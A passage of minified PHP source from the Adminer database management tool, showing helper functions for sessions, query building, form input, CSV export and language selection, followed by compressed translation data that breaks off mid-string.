set_password($li,$N,$V,$G){$_SESSION["pwds"][$li][$N][$V]=($_COOKIE["adminer_key"]&&is_string($G)?array(encrypt_string($G,$_COOKIE["adminer_key"])):$G);}function
get_password(){$J=get_session("pwds");if(is_array($J))$J=($_COOKIE["adminer_key"]?decrypt_string($J[0],$_COOKIE["adminer_key"]):false);return$J;}function
q($Q){global$g;return$g->quote($Q);}function
get_vals($H,$d=0){global$g;$J=array();$I=$g->query($H);if(is_object($I)){while($K=$I->fetch_row())$J[]=$K[$d];}return$J;}function
get_key_vals($H,$h=null,$wh=0){global$g;if(!is_object($h))$h=$g;$J=array();$h->timeout=$wh;$I=$h->query($H);$h->timeout=0;if(is_object($I)){while($K=$I->fetch_row())$J[$K[0]]=$K[1];}return$J;}function
get_rows($H,$h=null,$n="<p class='error'>"){global$g;$vb=(is_object($h)?$h:$g);$J=array();$I=$vb->query($H);if(is_object($I)){while($K=$I->fetch_assoc())$J[]=$K;}elseif(!$I&&!is_object($h)&&$n&&defined("PAGE_HEADER"))echo$n.error()."\n";return$J;}function
unique_array($K,$w){foreach($w
as$v){if(preg_match("~PRIMARY|UNIQUE~",$v["type"])){$J=array();foreach($v["columns"]as$y){if(!isset($K[$y]))continue
2;$J[$y]=$K[$y];}return$J;}}}function
escape_key($y){if(preg_match('(^([\w(]+)('.str_replace("_",".*",preg_quote(idf_escape("_"))).')([ \w)]+)$)',$y,$B))return$B[1].idf_escape(idf_unescape($B[2])).$B[3];return
idf_escape($y);}function
where($Z,$p=array()){global$g,$x;$J=array();foreach((array)$Z["where"]as$y=>$X){$y=bracket_escape($y,1);$d=escape_key($y);$J[]=$d.($x=="sql"&&preg_match('~^[0-9]*\\.[0-9]*$~',$X)?" LIKE ".q(addcslashes($X,"%_\\")):($x=="mssql"?" LIKE ".q(preg_replace('~[_%[]~','[\0]',$X)):" = ".unconvert_field($p[$y],q($X))));if($x=="sql"&&preg_match('~char|text~',$p[$y]["type"])&&preg_match("~[^ -@]~",$X))$J[]="$d = ".q($X)." COLLATE ".charset($g)."_bin";}foreach((array)$Z["null"]as$y)$J[]=escape_key($y)." IS NULL";return
implode(" AND ",$J);}function
where_check($X,$p=array()){parse_str($X,$bb);remove_slashes(array(&$bb));return
where($bb,$p);}function
where_link($s,$d,$Y,$Xe="="){return"&where%5B$s%5D%5Bcol%5D=".urlencode($d)."&where%5B$s%5D%5Bop%5D=".urlencode(($Y!==null?$Xe:"IS NULL"))."&where%5B$s%5D%5Bval%5D=".urlencode($Y);}function
convert_fields($e,$p,$M=array()){$J="";foreach($e
as$y=>$X){if($M&&!in_array(idf_escape($y),$M))continue;$Ga=convert_field($p[$y]);if($Ga)$J.=", $Ga AS ".idf_escape($y);}return$J;}function
cookie($C,$Y,$de=2592000){global$ba;return
header("Set-Cookie: $C=".urlencode($Y).($de?"; expires=".gmdate("D, d M Y H:i:s",time()+$de)." GMT":"")."; path=".preg_replace('~\\?.*~','',$_SERVER["REQUEST_URI"]).($ba?"; secure":"")."; HttpOnly; SameSite=lax",false);}function
restart_session(){if(!ini_bool("session.use_cookies"))session_start();}function
stop_session(){if(!ini_bool("session.use_cookies"))session_write_close();}function&get_session($y){return$_SESSION[$y][DRIVER][SERVER][$_GET["username"]];}function
set_session($y,$X){$_SESSION[$y][DRIVER][SERVER][$_GET["username"]]=$X;}function
auth_url($li,$N,$V,$m=null){global$Yb;preg_match('~([^?]*)\\??(.*)~',remove_from_uri(implode("|",array_keys($Yb))."|username|".($m!==null?"db|":"").session_name()),$B);return"$B[1]?".(sid()?SID."&":"").($li!="server"||$N!=""?urlencode($li)."=".urlencode($N)."&":"")."username=".urlencode($V).($m!=""?"&db=".urlencode($m):"").($B[2]?"&$B[2]":"");}function
is_ajax(){return($_SERVER["HTTP_X_REQUESTED_WITH"]=="XMLHttpRequest");}function
redirect($A,$se=null){if($se!==null){restart_session();$_SESSION["messages"][preg_replace('~^[^?]*~','',($A!==null?$A:$_SERVER["REQUEST_URI"]))][]=$se;}if($A!==null){if($A=="")$A=".";header("Location: $A");exit;}}function
query_redirect($H,$A,$se,$ag=true,$xc=true,$Ec=false,$vh=""){global$g,$n,$b;if($xc){$Vg=microtime(true);$Ec=!$g->query($H);$vh=format_time($Vg);}$Tg="";if($H)$Tg=$b->messageQuery($H,$vh);if($Ec){$n=error().$Tg;return
false;}if($ag)redirect($A,$se.$Tg);return
true;}function
queries($H){global$g;static$Uf=array();static$Vg;if(!$Vg)$Vg=microtime(true);if($H===null)return
array(implode("\n",$Uf),format_time($Vg));$Uf[]=(preg_match('~;$~',$H)?"DELIMITER ;;\n$H;\nDELIMITER ":$H).";";return$g->query($H);}function
apply_queries($H,$T,$tc='table'){foreach($T
as$R){if(!queries("$H ".$tc($R)))return
false;}return
true;}function
queries_redirect($A,$se,$ag){list($Uf,$vh)=queries(null);return
query_redirect($Uf,$A,$se,$ag,false,!$ag,$vh);}function
format_time($Vg){return
lang(1,max(0,microtime(true)-$Vg));}function
remove_from_uri($qf=""){return
substr(preg_replace("~(?<=[?&])($qf".(SID?"":"|".session_name()).")=[^&]*&~",'',"$_SERVER[REQUEST_URI]&"),0,-1);}function
pagination($E,$Eb){return" ".($E==$Eb?$E+1:'<a href="'.h(remove_from_uri("page").($E?"&page=$E".($_GET["next"]?"&next=".urlencode($_GET["next"]):""):"")).'">'.($E+1)."</a>");}function
get_file($y,$Lb=false){$Jc=$_FILES[$y];if(!$Jc)return
null;foreach($Jc
as$y=>$X)$Jc[$y]=(array)$X;$J='';foreach($Jc["error"]as$y=>$n){if($n)return$n;$C=$Jc["name"][$y];$Ch=$Jc["tmp_name"][$y];$xb=file_get_contents($Lb&&preg_match('~\\.gz$~',$C)?"compress.zlib://$Ch":$Ch);if($Lb){$Vg=substr($xb,0,3);if(function_exists("iconv")&&preg_match("~^\xFE\xFF|^\xFF\xFE~",$Vg,$gg))$xb=iconv("utf-16","utf-8",$xb);elseif($Vg=="\xEF\xBB\xBF")$xb=substr($xb,3);$J.=$xb."\n\n";}else$J.=$xb;}return$J;}function
upload_error($n){$pe=($n==UPLOAD_ERR_INI_SIZE?ini_get("upload_max_filesize"):0);return($n?lang(2).($pe?" ".lang(3,$pe):""):lang(4));}function
repeat_pattern($Af,$be){return
str_repeat("$Af{0,65535}",$be/65535)."$Af{0,".($be%65535)."}";}function
is_utf8($X){return(preg_match('~~u',$X)&&!preg_match('~[\\0-\\x8\\xB\\xC\\xE-\\x1F]~',$X));}function
shorten_utf8($Q,$be=80,$bh=""){if(!preg_match("(^(".repeat_pattern("[\t\r\n -\x{10FFFF}]",$be).")($)?)u",$Q,$B))preg_match("(^(".repeat_pattern("[\t\r\n -~]",$be).")($)?)",$Q,$B);return
h($B[1]).$bh.(isset($B[2])?"":"<i>...</i>");}function
format_number($X){return
strtr(number_format($X,0,".",lang(5)),preg_split('~~u',lang(6),-1,PREG_SPLIT_NO_EMPTY));}function
friendly_url($X){return
preg_replace('~[^a-z0-9_]~i','-',$X);}function
hidden_fields($Qf,$qd=array()){while(list($y,$X)=each($Qf)){if(!in_array($y,$qd)){if(is_array($X)){foreach($X
as$Kd=>$W)$Qf[$y."[$Kd]"]=$W;}else
echo'<input type="hidden" name="'.h($y).'" value="'.h($X).'">';}}}function
hidden_fields_get(){echo(sid()?'<input type="hidden" name="'.session_name().'" value="'.h(session_id()).'">':''),(SERVER!==null?'<input type="hidden" name="'.DRIVER.'" value="'.h(SERVER).'">':""),'<input type="hidden" name="username" value="'.h($_GET["username"]).'">';}function
table_status1($R,$Fc=false){$J=table_status($R,$Fc);return($J?$J:array("Name"=>$R));}function
column_foreign_keys($R){global$b;$J=array();foreach($b->foreignKeys($R)as$q){foreach($q["source"]as$X)$J[$X][]=$q;}return$J;}function
enum_input($U,$Ja,$o,$Y,$nc=null){global$b;preg_match_all("~'((?:[^']|'')*)'~",$o["length"],$ke);$J=($nc!==null?"<label><input type='$U'$Ja value='$nc'".((is_array($Y)?in_array($nc,$Y):$Y===0)?" checked":"")."><i>".lang(7)."</i></label>":"");foreach($ke[1]as$s=>$X){$X=stripcslashes(str_replace("''","'",$X));$db=(is_int($Y)?$Y==$s+1:(is_array($Y)?in_array($s+1,$Y):$Y===$X));$J.=" <label><input type='$U'$Ja value='".($s+1)."'".($db?' checked':'').'>'.h($b->editVal($X,$o)).'</label>';}return$J;}function
input($o,$Y,$r){global$g,$Rh,$b,$x;$C=h(bracket_escape($o["field"]));echo"<td class='function'>";if(is_array($Y)&&!$r){$Ea=array($Y);if(version_compare(PHP_VERSION,5.4)>=0)$Ea[]=JSON_PRETTY_PRINT;$Y=call_user_func_array('json_encode',$Ea);$r="json";}$jg=($x=="mssql"&&$o["auto_increment"]);if($jg&&!$_POST["save"])$r=null;$Zc=(isset($_GET["select"])||$jg?array("orig"=>lang(8)):array())+$b->editFunctions($o);$Ja=" name='fields[$C]'";if($o["type"]=="enum")echo
nbsp($Zc[""])."<td>".$b->editInput($_GET["edit"],$o,$Ja,$Y);else{$Mc=0;foreach($Zc
as$y=>$X){if($y===""||!$X)break;$Mc++;}$Ue=($Mc?" onchange=\"var f = this.form['function[".h(js_escape(bracket_escape($o["field"])))."]']; if ($Mc > f.selectedIndex) f.selectedIndex = $Mc;\" onkeyup='keyupChange.call(this);'":"");$Ja.=$Ue;$hd=(in_array($r,$Zc)||isset($Zc[$r]));echo(count($Zc)>1?"<select name='function[$C]' onchange='functionChange(this);'".on_help("getTarget(event).value.replace(/^SQL\$/, '')",1).">".optionlist($Zc,$r===null||$hd?$r:"")."</select>":nbsp(reset($Zc))).'<td>';$zd=$b->editInput($_GET["edit"],$o,$Ja,$Y);if($zd!="")echo$zd;elseif(preg_match('~bool~',$o["type"]))echo"<input type='hidden'$Ja value='0'>"."<input type='checkbox'".(in_array(strtolower($Y),array('1','t','true','y','yes','on'))?" checked='checked'":"")."$Ja value='1'>";elseif($o["type"]=="set"){preg_match_all("~'((?:[^']|'')*)'~",$o["length"],$ke);foreach($ke[1]as$s=>$X){$X=stripcslashes(str_replace("''","'",$X));$db=(is_int($Y)?($Y>>$s)&1:in_array($X,explode(",",$Y),true));echo" <label><input type='checkbox' name='fields[$C][$s]' value='".(1<<$s)."'".($db?' checked':'')."$Ue>".h($b->editVal($X,$o)).'</label>';}}elseif(preg_match('~blob|bytea|raw|file~',$o["type"])&&ini_bool("file_uploads"))echo"<input type='file' name='fields-$C'$Ue>";elseif(($th=preg_match('~text|lob~',$o["type"]))||preg_match("~\n~",$Y)){if($th&&$x!="sqlite")$Ja.=" cols='50' rows='12'";else{$L=min(12,substr_count($Y,"\n")+1);$Ja.=" cols='30' rows='$L'".($L==1?" style='height: 1.2em;'":"");}echo"<textarea$Ja>".h($Y).'</textarea>';}elseif($r=="json"||preg_match('~^jsonb?$~',$o["type"]))echo"<textarea$Ja cols='50' rows='12' class='jush-js'>".h($Y).'</textarea>';else{$re=(!preg_match('~int~',$o["type"])&&preg_match('~^(\\d+)(,(\\d+))?$~',$o["length"],$B)?((preg_match("~binary~",$o["type"])?2:1)*$B[1]+($B[3]?1:0)+($B[2]&&!$o["unsigned"]?1:0)):($Rh[$o["type"]]?$Rh[$o["type"]]+($o["unsigned"]?0:1):0));if($x=='sql'&&$g->server_info>=5.6&&preg_match('~time~',$o["type"]))$re+=7;echo"<input".((!$hd||$r==="")&&preg_match('~(?<!o)int~',$o["type"])&&!preg_match('~\[\]~',$o["full_type"])?" type='number'":"")." value='".h($Y)."'".($re?" data-maxlength='$re'":"").(preg_match('~char|binary~',$o["type"])&&$re>20?" size='40'":"")."$Ja>";}}}function
process_input($o){global$b;$u=bracket_escape($o["field"]);$r=$_POST["function"][$u];$Y=$_POST["fields"][$u];if($o["type"]=="enum"){if($Y==-1)return
false;if($Y=="")return"NULL";return+$Y;}if($o["auto_increment"]&&$Y=="")return
null;if($r=="orig")return($o["on_update"]=="CURRENT_TIMESTAMP"?idf_escape($o["field"]):false);if($r=="NULL")return"NULL";if($o["type"]=="set")return
array_sum((array)$Y);if($r=="json"){$r="";$Y=json_decode($Y,true);if(!is_array($Y))return
false;return$Y;}if(preg_match('~blob|bytea|raw|file~',$o["type"])&&ini_bool("file_uploads")){$Jc=get_file("fields-$u");if(!is_string($Jc))return
false;return
q($Jc);}return$b->processInput($o,$Y,$r);}function
fields_from_edit(){global$Xb;$J=array();foreach((array)$_POST["field_keys"]as$y=>$X){if($X!=""){$X=bracket_escape($X);$_POST["function"][$X]=$_POST["field_funs"][$y];$_POST["fields"][$X]=$_POST["field_vals"][$y];}}foreach((array)$_POST["fields"]as$y=>$X){$C=bracket_escape($y,1);$J[$C]=array("field"=>$C,"privileges"=>array("insert"=>1,"update"=>1),"null"=>1,"auto_increment"=>($y==$Xb->primary),);}return$J;}function
search_tables(){global$b,$g;$_GET["where"][0]["op"]="LIKE %%";$_GET["where"][0]["val"]=$_POST["query"];$Vc=false;foreach(table_status('',true)as$R=>$S){$C=$b->tableName($S);if(isset($S["Engine"])&&$C!=""&&(!$_POST["tables"]||in_array($R,$_POST["tables"]))){$I=$g->query("SELECT".limit("1 FROM ".table($R)," WHERE ".implode(" AND ",$b->selectSearchProcess(fields($R),array())),1));if(!$I||$I->fetch_row()){if(!$Vc){echo"<ul>\n";$Vc=true;}echo"<li>".($I?"<a href='".h(ME."select=".urlencode($R)."&where[0][op]=".urlencode($_GET["where"][0]["op"])."&where[0][val]=".urlencode($_GET["where"][0]["val"]))."'>$C</a>\n":"$C: <span class='error'>".error()."</span>\n");}}}echo($Vc?"</ul>":"<p class='message'>".lang(9))."\n";}function
dump_headers($od,$Ae=false){global$b;$J=$b->dumpHeaders($od,$Ae);$of=$_POST["output"];if($of!="text")header("Content-Disposition: attachment; filename=".$b->dumpFilename($od).".$J".($of!="file"&&!preg_match('~[^0-9a-z]~',$of)?".$of":""));session_write_close();ob_flush();flush();return$J;}function
dump_csv($K){foreach($K
as$y=>$X){if(preg_match("~[\"\n,;\t]~",$X)||$X==="")$K[$y]='"'.str_replace('"','""',$X).'"';}echo
implode(($_POST["format"]=="csv"?",":($_POST["format"]=="tsv"?"\t":";")),$K)."\r\n";}function
apply_sql_function($r,$d){return($r?($r=="unixepoch"?"DATETIME($d, '$r')":($r=="count distinct"?"COUNT(DISTINCT ":strtoupper("$r("))."$d)"):$d);}function
get_temp_dir(){$J=ini_get("upload_tmp_dir");if(!$J){if(function_exists('sys_get_temp_dir'))$J=sys_get_temp_dir();else{$Kc=@tempnam("","");if(!$Kc)return
false;$J=dirname($Kc);unlink($Kc);}}return$J;}function
password_file($i){$Kc=get_temp_dir()."/adminer.key";$J=@file_get_contents($Kc);if($J||!$i)return$J;$Xc=@fopen($Kc,"w");if($Xc){chmod($Kc,0660);$J=rand_string();fwrite($Xc,$J);fclose($Xc);}return$J;}function
rand_string(){return
md5(uniqid(mt_rand(),true));}function
select_value($X,$_,$o,$uh){global$b,$ba;if(is_array($X)){$J="";foreach($X
as$Kd=>$W)$J.="<tr>".($X!=array_values($X)?"<th>".h($Kd):"")."<td>".select_value($W,$_,$o,$uh);return"<table cellspacing='0'>$J</table>";}if(!$_)$_=$b->selectLink($X,$o);if($_===null){if(is_mail($X))$_="mailto:$X";if($Sf=is_url($X))$_=(($Sf=="http"&&$ba)||preg_match('~WebKit|Firefox~i',$_SERVER["HTTP_USER_AGENT"])?$X:"https://www.adminer.org/redirect/?url=".urlencode($X));}$J=$b->editVal($X,$o);if($J!==null){if($J==="")$J=" ";elseif(!is_utf8($J))$J="\0";elseif($uh!=""&&is_shortable($o))$J=shorten_utf8($J,max(0,+$uh));else$J=h($J);}return$b->selectVal($J,$_,$o,$X);}function
is_mail($kc){$Ha='[-a-z0-9!#$%&\'*+/=?^_`{|}~]';$Wb='[a-z0-9]([-a-z0-9]{0,61}[a-z0-9])';$Af="$Ha+(\\.$Ha+)*@($Wb?\\.)+$Wb";return
is_string($kc)&&preg_match("(^$Af(,\\s*$Af)*\$)i",$kc);}function
is_url($Q){$Wb='[a-z0-9]([-a-z0-9]{0,61}[a-z0-9])';return(preg_match("~^(https?)://($Wb?\\.)+$Wb(:\\d+)?(/.*)?(\\?.*)?(#.*)?\$~i",$Q,$B)?strtolower($B[1]):"");}function
is_shortable($o){return
preg_match('~char|text|lob|geometry|point|linestring|polygon|string|bytea~',$o["type"]);}function
count_rows($R,$Z,$Ed,$cd){global$x;$H=" FROM ".table($R).($Z?" WHERE ".implode(" AND ",$Z):"");return($Ed&&($x=="sql"||count($cd)==1)?"SELECT COUNT(DISTINCT ".implode(", ",$cd).")$H":"SELECT COUNT(*)".($Ed?" FROM (SELECT 1$H$dd) x":$H));}function
slow_query($H){global$b,$Dh;$m=$b->database();$wh=$b->queryTimeout();if(support("kill")&&is_object($h=connect())&&($m==""||$h->select_db($m))){$Pd=$h->result(connection_id());echo'<script type="text/javascript">
var timeout = setTimeout(function () {
ajax(\'',js_escape(ME),'script=kill\', function () {
}, \'token=',$Dh,'&kill=',$Pd,'\');
}, ',1000*$wh,');
</script>
';}else$h=null;ob_flush();flush();$J=@get_key_vals($H,$h,$wh);if($h){echo"<script type='text/javascript'>clearTimeout(timeout);</script>\n";ob_flush();flush();}return
array_keys($J);}function
get_token(){$Xf=rand(1,1e6);return($Xf^$_SESSION["token"]).":$Xf";}function
verify_token(){list($Dh,$Xf)=explode(":",$_POST["token"]);return($Xf^$_SESSION["token"])==$Dh;}function
lzw_decompress($Ra){$Sb=256;$Sa=8;$kb=array();$lg=0;$mg=0;for($s=0;$s<strlen($Ra);$s++){$lg=($lg<<8)+ord($Ra[$s]);$mg+=8;if($mg>=$Sa){$mg-=$Sa;$kb[]=$lg>>$mg;$lg&=(1<<$mg)-1;$Sb++;if($Sb>>$Sa)$Sa++;}}$Rb=range("\0","\xFF");$J="";foreach($kb
as$s=>$jb){$jc=$Rb[$jb];if(!isset($jc))$jc=$ti.$ti[0];$J.=$jc;if($s)$Rb[]=$ti.$jc[0];$ti=$jc;}return$J;}function
on_help($qb,$Kg=0){return" onmouseover='helpMouseover(this, event, ".h($qb).", $Kg);' onmouseout='helpMouseout(this, event);'";}function
edit_form($a,$p,$K,$Zh){global$b,$x,$Dh,$n;$gh=$b->tableName(table_status1($a,true));page_header(($Zh?lang(10):lang(11)),$n,array("select"=>array($a,$gh)),$gh);if($K===false)echo"<p class='error'>".lang(12)."\n";echo'<form action="" method="post" enctype="multipart/form-data" id="form">
';if(!$p)echo"<p class='error'>".lang(13)."\n";else{echo"<table cellspacing='0' onkeydown='return editingKeydown(event);'>\n";foreach($p
as$C=>$o){echo"<tr><th>".$b->fieldName($o);$Mb=$_GET["set"][bracket_escape($C)];if($Mb===null){$Mb=$o["default"];if($o["type"]=="bit"&&preg_match("~^b'([01]*)'\$~",$Mb,$gg))$Mb=$gg[1];}$Y=($K!==null?($K[$C]!=""&&$x=="sql"&&preg_match("~enum|set~",$o["type"])?(is_array($K[$C])?array_sum($K[$C]):+$K[$C]):$K[$C]):(!$Zh&&$o["auto_increment"]?"":(isset($_GET["select"])?false:$Mb)));if(!$_POST["save"]&&is_string($Y))$Y=$b->editVal($Y,$o);$r=($_POST["save"]?(string)$_POST["function"][$C]:($Zh&&$o["on_update"]=="CURRENT_TIMESTAMP"?"now":($Y===false?null:($Y!==null?'':'NULL'))));if(preg_match("~time~",$o["type"])&&$Y=="CURRENT_TIMESTAMP"){$Y="";$r="now";}input($o,$Y,$r);echo"\n";}if(!support("table"))echo"<tr>"."<th><input name='field_keys[]' onkeyup='keyupChange.call(this);' onchange='fieldChange(this);' value=''>"."<td class='function'>".html_select("field_funs[]",$b->editFunctions(array("null"=>isset($_GET["select"]))))."<td><input name='field_vals[]'>"."\n";echo"</table>\n";}echo"<p>\n";if($p){echo"<input type='submit' value='".lang(14)."'>\n";if(!isset($_GET["select"]))echo"<input type='submit' name='insert' value='".($Zh?lang(15)."' onclick='return !ajaxForm(this.form, \"".lang(16).'...", this)':lang(17))."' title='Ctrl+Shift+Enter'>\n";}echo($Zh?"<input type='submit' name='delete' value='".lang(18)."'".confirm().">\n":($_POST||!$p?"":"<script type='text/javascript'>focus(document.getElementById('form').getElementsByTagName('td')[1].firstChild);</script>\n"));if(isset($_GET["select"]))hidden_fields(array("check"=>(array)$_POST["check"],"clone"=>$_POST["clone"],"all"=>$_POST["all"]));echo'<input type="hidden" name="referer" value="',h(isset($_POST["referer"])?$_POST["referer"]:$_SERVER["HTTP_REFERER"]),'">
<input type="hidden" name="save" value="1">
<input type="hidden" name="token" value="',$Dh,'">
</form>
';}global$b,$g,$Yb,$gc,$qc,$n,$Zc,$ed,$ba,$yd,$x,$ca,$Ud,$Te,$Bf,$Yg,$id,$Dh,$Ih,$Rh,$Yh,$ia;if(!$_SERVER["REQUEST_URI"])$_SERVER["REQUEST_URI"]=$_SERVER["ORIG_PATH_INFO"];if(!strpos($_SERVER["REQUEST_URI"],'?')&&$_SERVER["QUERY_STRING"]!="")$_SERVER["REQUEST_URI"].="?$_SERVER[QUERY_STRING]";$ba=$_SERVER["HTTPS"]&&strcasecmp($_SERVER["HTTPS"],"off");@ini_set("session.use_trans_sid",false);session_cache_limiter("");if(!defined("SID")){session_name("adminer_sid");$F=array(0,preg_replace('~\\?.*~','',$_SERVER["REQUEST_URI"]),"",$ba);if(version_compare(PHP_VERSION,'5.2.0')>=0)$F[]=true;call_user_func_array('session_set_cookie_params',$F);session_start();}remove_slashes(array(&$_GET,&$_POST,&$_COOKIE),$Lc);if(get_magic_quotes_runtime())set_magic_quotes_runtime(false);@set_time_limit(0);@ini_set("zend.ze1_compatibility_mode",false);@ini_set("precision",20);$Ud=array('en'=>'English','ar'=>'العربية','bg'=>'Български','bn'=>'বাংলা','bs'=>'Bosanski','ca'=>'Català','cs'=>'Čeština','da'=>'Dansk','de'=>'Deutsch','el'=>'Ελληνικά','es'=>'Español','et'=>'Eesti','fa'=>'فارسی','fi'=>'Suomi','fr'=>'Français','gl'=>'Galego','hu'=>'Magyar','id'=>'Bahasa Indonesia','it'=>'Italiano','ja'=>'日本語','ko'=>'한국어','lt'=>'Lietuvių','nl'=>'Nederlands','no'=>'Norsk','pl'=>'Polski','pt'=>'Português','pt-br'=>'Português (Brazil)','ro'=>'Limba Română','ru'=>'Русский','sk'=>'Slovenčina','sl'=>'Slovenski','sr'=>'Српски','ta'=>'தமிழ்','th'=>'ภาษาไทย','tr'=>'Türkçe','uk'=>'Українська','vi'=>'Tiếng Việt','zh'=>'简体中文','zh-tw'=>'繁體中文',);function
get_lang(){global$ca;return$ca;}function
lang($u,$Ke=null){if(is_string($u)){$Ef=array_search($u,get_translations("en"));if($Ef!==false)$u=$Ef;}global$ca,$Ih;$Hh=($Ih[$u]?$Ih[$u]:$u);if(is_array($Hh)){$Ef=($Ke==1?0:($ca=='cs'||$ca=='sk'?($Ke&&$Ke<5?1:2):($ca=='fr'?(!$Ke?0:1):($ca=='pl'?($Ke%10>1&&$Ke%10<5&&$Ke/10%10!=1?1:2):($ca=='sl'?($Ke%100==1?0:($Ke%100==2?1:($Ke%100==3||$Ke%100==4?2:3))):($ca=='lt'?($Ke%10==1&&$Ke%100!=11?0:($Ke%10>1&&$Ke/10%10!=1?1:2)):($ca=='bs'||$ca=='ru'||$ca=='sr'||$ca=='uk'?($Ke%10==1&&$Ke%100!=11?0:($Ke%10>1&&$Ke%10<5&&$Ke/10%10!=1?1:2)):1)))))));$Hh=$Hh[$Ef];}$Ea=func_get_args();array_shift($Ea);$Uc=str_replace("%d","%s",$Hh);if($Uc!=$Hh)$Ea[0]=format_number($Ke);return
vsprintf($Uc,$Ea);}function
switch_lang(){global$ca,$Ud;echo"<form action='' method='post'>\n<div id='lang'>",lang(19).": ".html_select("lang",$Ud,$ca,"this.form.submit();")," <input type='submit' value='".lang(20)."' class='hidden'>\n","<input type='hidden' name='token' value='".get_token()."'>\n";echo"</div>\n</form>\n";}if(isset($_POST["lang"])&&verify_token()){cookie("adminer_lang",$_POST["lang"]);$_SESSION["lang"]=$_POST["lang"];$_SESSION["translations"]=array();redirect(remove_from_uri());}$ca="en";if(isset($Ud[$_COOKIE["adminer_lang"]])){cookie("adminer_lang",$_COOKIE["adminer_lang"]);$ca=$_COOKIE["adminer_lang"];}elseif(isset($Ud[$_SESSION["lang"]]))$ca=$_SESSION["lang"];else{$ua=array();preg_match_all('~([-a-z]+)(;q=([0-9.]+))?~',str_replace("_","-",strtolower($_SERVER["HTTP_ACCEPT_LANGUAGE"])),$ke,PREG_SET_ORDER);foreach($ke
as$B)$ua[$B[1]]=(isset($B[3])?$B[3]:1);arsort($ua);foreach($ua
as$y=>$Tf){if(isset($Ud[$y])){$ca=$y;break;}$y=preg_replace('~-.*~','',$y);if(!isset($ua[$y])&&isset($Ud[$y])){$ca=$y;break;}}}$Ih=$_SESSION["translations"];if($_SESSION["translations_version"]!=1854356247){$Ih=array();$_SESSION["translations_version"]=1854356247;}function
get_translations($Td){switch($Td){case"en":$f="A9Dy@s:G(ff :Sa2\"1..L'Im#s,KOP#I@%9i4o2ύ,9%Pb2ar\n2NC(r41C`(:Eb9Ai:&㙔yFY\r\n 8ZS=\$A`=܌0\ndF n:Zΰ)QAk}eADaį\\}5#|@h3N}@it>.y8Rm\"3z#kN!-c䲉(;X#|,bzʢ9>):C \0.#Ӊz7:ތ@FPxC@:t㼤\$jֿ8Dzo(Mʎ@7XD +/6^0}|(LHͮ-D;E!-863@ɌK-\n,<MRUl!b_\nOZ\r 15^2LSc\rlӊtEèELO3LQ1\0Sz<,Ȥq9ikl*8z3ږXQ' @WMOxC<!0\nr,#^c9(N#d;4dy&<1140+\"ލGcp9c5\0Xir~uс:s@ǯ;m۠0e_l2;YJB!bˍ\\z|C2Θpk^j>eLOX4#&Ύ\\ ܔ%P48EQbB1!R4%It)ɸԹ12LD6\rt9,1;OA>Oܧ0Z-L8fj\\TU\"2O#\0-.x&(z/\0RH \"qMk|gbTK q0nA\$ 2➼I5sUڝֱ\")=B] K)͙|@C\0Һs1w2+xS\nMT(̢c<(,גS.lPXY3\$x(\n&ɒ0 7v\"IH:\"KPRۜFHpp \n@\"@T\"/V0j>ȝ/S(RRQ樣tql4𝧒|B0e&XŚc UgQ`?C`(+ Xϡ3Gr:X9`\rt4AH-(-RBu+pUi-hҸ4TD+,Q&uI^sxKC'dN)T\n\n.~-ux2\nZAIMlƭ{h-&UtO|3`Q+@cMeڳ[T!\$_>igA?(r0qYC /E\\HLADٶ[! -rHmC@&oۃ hJ5zs%\n\\tj% `{hO]7zM'Т9%u WF]ؔ(r0(bM*!E5d8@_Z0x6\\TYϠHCe3x&%\$`bm˼jXLQ׀3(}8m\rA!|I~`-jTyK%3?*[X<I,+umJHZ'gZs3E\rYнB}=HdY,R*6PEϑ%hz\nv3Ty^~O*3!gS;mC>\"BՔWd-^1hI[j)Yh57TkcEŋX)_bpMnRdrDm߶fYf,v`,+[{7\\]9BW@HM)M<1\$\r#d?-B#\0M[m{=-7g-x&Z)=\r]+[L5v>bϒ9[ʰ7]N<_G{g57٥Z*Lc7ߖu<J+\nj2.\n/!u0c%?9.ȔU`S,@T=-e<\r2)^ק>|y9磸t!--\0gwNp#/l'%O괮P#_~}o!RWϓk{>'FFϫ\0}H8-z*O\r%}|J8<\\(*4^P`\$.L˰ܬö#\"-R:6./T ⢢cUNxۍԻP%l.M\rV0\rnH\$l#Oƶ/'>?ڗ@ZZ>KƺΐZPot}+N\"�hz4 P6#h.⚰P3 .APb@71n Z]%j B!0B0̟\$Zd\n!1ΧqLˣ\\u&̎>m̀@{qJJ'j\nJ>fh̓F \\\0A2\\\0 #Nt%邛\$'e>-<\0BJ,pO,@) (q ,J\"d:)Բ.hZGbLh*K!R\r!\\";break;case"ar":$f="CPl*\r,&\nA(J.0Se\\\rb@0,\nQ,l)µAj_1CMeS\ng@OgXDM)0cAn8e*y#au4 Ir*;rSUdJ }*zU@X;ai1l(n[ydu'c(oFe3Nbp2NSӳ:LZzP\\bu.[Q`u !)&<q) F>ءPs7X5g5KK¦0ʇƢ\nS r\$j(v!Jbq0\nj\nj@zl<\$WrؓsU&[*lꎠ(B&4_!d\\B=t[ ?:XؐeJ \$\n&3ޜ:OKЬJ\0x0#3:xQ6c(\ru`<7cp4D5p:S\"0XD #h|vkz7l9&\r-ڞ&mI\nH=s2NAD\n r\\eE]\rLij&\$[2BݯZƒQ?iA_Ŗ!)t*PK#:6+/sI' j>\\lUHE*\\>fdAxo͈AkMB6T6WJ9v\$DIͼ&-HqZ80 H^G:MnOhN|3\$\nlCƼ̊aq%(Zouώ]Zٵ`nl<;οto<7l0VF6LA^x3\rK\n+WөMɸ*\r@b!\0[c6T\rxach9{0a5@:a@\nJy'!01*|C+Arl!\0{ˊDlt֛[1z\\*hu;[ !CPR\\C9eKF)н=\nJ\n`d&nÑ;ղCp\r*X2A&TSjuOF*U*VbժW ]|\rc,rZKP-`жԅ!ҮRnYˌ*JO1irJ?D\nUI*Cma\r s`keZU(}J{w+%(O#PdT6D4/+lxF)(e#ti2O&!&a\$> i[&-ܶM\nX80r\r\$V 1m\r2T4@'0Bȋ\\Ĕ/iMBM쵣XJRt)սs! CF@MX2@P3缲z\nP1}\0005Ɣ֩@Se*Y#\r#j*qСUd\$|T\0\0U\n @_\0D0\"d =1.Ӂjʡjr@%.ڼAғyMjH?a8f&L\rA1a`KK:FKޮ.דz4.ss BqoDyBnnt(3*\r-:+i@ئ\0u!,=qĈ#zQ<\"ˉTKPs¯dFNpsuM4wAL4dp)S^dn97z-;EؠY~%dֆPMCaH`'eKC䴔k] vdQ\$Z'vfJM2M&X0FJP^5e)sƞla:`P 0'\r&ʩcL穷!P\" 